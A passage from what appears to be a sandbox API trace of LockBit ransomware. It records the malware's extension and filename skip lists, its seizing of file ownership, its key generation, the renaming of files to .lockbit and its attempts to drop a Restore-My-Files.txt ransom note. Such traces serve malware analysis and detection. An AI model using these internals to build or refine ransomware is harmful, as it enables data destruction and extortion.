(lpString1=".ics", lpString2=".png") returned -1 [0079.443] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.443] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.443] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.443] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.443] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.443] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.443] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.443] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.443] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.443] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.443] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.443] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.443] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="babypink.png") returned 1 [0079.444] lstrcmpiW (lpString1="ntldr", lpString2="babypink.png") returned 1 [0079.444] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="babypink.png") returned 1 [0079.444] lstrcmpiW (lpString1="bootsect.bak", lpString2="babypink.png") returned 1 [0079.444] lstrcmpiW (lpString1="autorun.inf", lpString2="babypink.png") returned -1 [0079.444] lstrcmpiW (lpString1="thumbs.db", lpString2="babypink.png") returned 1 [0079.444] lstrcmpiW (lpString1="iconcache.db", lpString2="babypink.png") returned 1 [0079.444] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.444] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png") returned=".png" [0079.444] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.444] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.444] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.444] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.444] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.444] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.444] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.444] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.444] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.444] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.444] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.444] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.444] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.444] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.444] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.444] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.444] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.444] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.445] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.445] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.445] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.445] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.445] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.445] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.445] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.445] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.445] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.445] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.445] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png.lockbit") returned 74 [0079.445] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\babypink.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.446] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.446] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.446] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.446] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.446] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.446] RtlFreeAnsiString (AnsiString="\\") [0079.446] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.447] malloc (_Size=0x200) returned 0x77d800 [0079.447] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.447] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.447] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.447] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.447] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.448] CloseHandle (hObject=0x3c4) returned 1 [0079.448] free (_Block=0x77d800) [0079.448] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\babypink.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.448] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.448] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.448] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=19477) returned 1 [0079.448] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.449] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.449] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.449] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.449] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.454] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.454] malloc (_Size=0xaa) returned 0x1ff1e60 [0079.454] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xaa, FileInformationClass=0xa) returned 0xc0000008 [0079.461] free (_Block=0x1ff1e60) [0079.461] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\babypink.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.461] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.461] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.461] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x728a4ecf, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x728a4ecf, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49fbfaf1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xcc1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="background.png", cAlternateFileName="")) returned 1 [0079.461] lstrcmpiW (lpString1=".", lpString2="background.png") returned -1 [0079.461] lstrcmpiW (lpString1="..", lpString2="background.png") returned -1 [0079.461] PathFindExtensionW (pszPath="background.png") returned=".png" [0079.461] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0079.461] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0079.462] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0079.462] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0079.462] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.462] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0079.463] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0079.463] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0079.463] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0079.463] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0079.463] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0079.463] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0079.463] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0079.463] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0079.463] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0079.463] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0079.463] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0079.463] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0079.463] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0079.463] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0079.463] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0079.463] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0079.463] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0079.463] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0079.463] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0079.463] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0079.463] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0079.463] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="background.png") returned 1 [0079.463] lstrcmpiW (lpString1="ntldr", lpString2="background.png") returned 1 [0079.464] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="background.png") returned 1 [0079.464] lstrcmpiW (lpString1="bootsect.bak", lpString2="background.png") returned 1 [0079.464] lstrcmpiW (lpString1="autorun.inf", lpString2="background.png") returned -1 [0079.464] lstrcmpiW (lpString1="thumbs.db", lpString2="background.png") returned 1 [0079.464] lstrcmpiW (lpString1="iconcache.db", lpString2="background.png") returned 1 [0079.464] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.464] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png") returned=".png" [0079.464] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0079.464] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0079.464] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0079.464] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0079.464] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0079.464] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0079.464] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0079.464] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0079.464] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0079.464] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0079.464] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0079.464] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0079.464] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0079.464] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0079.464] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0079.464] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0079.464] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0079.464] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0079.465] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0079.465] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0079.465] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0079.465] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0079.465] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0079.465] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0079.465] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0079.465] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0079.465] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0079.465] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0079.465] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png.lockbit") returned 76 [0079.465] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.466] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0079.466] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0079.466] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.466] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0079.466] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0079.466] RtlFreeAnsiString (AnsiString="\\") [0079.466] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0079.466] malloc (_Size=0x200) returned 0x77d800 [0079.467] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0079.467] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.467] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0079.467] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.467] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0079.467] CloseHandle (hObject=0x3c4) returned 1 [0079.467] free (_Block=0x77d800) [0079.468] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0079.468] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0079.468] malloc (_Size=0x40068) returned 0x1fb18c0 [0079.468] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=52251) returned 1 [0079.468] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.468] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.468] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0079.468] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.469] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0079.469] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.474] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0079.474] malloc (_Size=0xae) returned 0x1ff1e60 [0079.474] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xae, FileInformationClass=0xa) returned 0x0 [0079.480] free (_Block=0x1ff1e60) [0079.481] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl") returned 1 [0079.481] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt") returned 74 [0079.481] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.481] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x728cb02c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x728cb02c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49fe5c4f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2c432, dwReserved0=0x0, dwReserved1=0x0, cFileName="bear_formatted_matte2.wmv", cAlternateFileName="")) returned 1 [0079.481] lstrcmpiW (lpString1=".", lpString2="bear_formatted_matte2.wmv") returned -1 [0079.481] lstrcmpiW (lpString1="..", lpString2="bear_formatted_matte2.wmv") returned -1 [0079.481] PathFindExtensionW (pszPath="bear_formatted_matte2.wmv") returned=".wmv" [0079.481] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0079.481] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0079.481] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0079.481] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0079.481] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0079.481] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0079.481] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0079.481] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0079.481] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0079.481] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0079.481] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0079.481] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0079.481] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0079.481] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0079.481] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0079.482] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0079.482] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0079.483] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0079.483] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0079.483] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0079.483] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0079.483] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0079.483] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="bear_formatted_matte2.wmv") returned 1 [0079.483] lstrcmpiW (lpString1="ntldr", lpString2="bear_formatted_matte2.wmv") returned 1 [0079.483] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="bear_formatted_matte2.wmv") returned 1 [0079.483] lstrcmpiW (lpString1="bootsect.bak", lpString2="bear_formatted_matte2.wmv") returned 1 [0079.483] lstrcmpiW (lpString1="autorun.inf", lpString2="bear_formatted_matte2.wmv") returned -1 [0079.483] lstrcmpiW (lpString1="thumbs.db", lpString2="bear_formatted_matte2.wmv") returned 1 [0079.483] lstrcmpiW (lpString1="iconcache.db", lpString2="bear_formatted_matte2.wmv") returned 1 [0079.483] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\") returned="" [0079.483] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\bear_formatted_matte2.wmv") returned=".wmv" [0079.483] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0079.483] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0079.483] 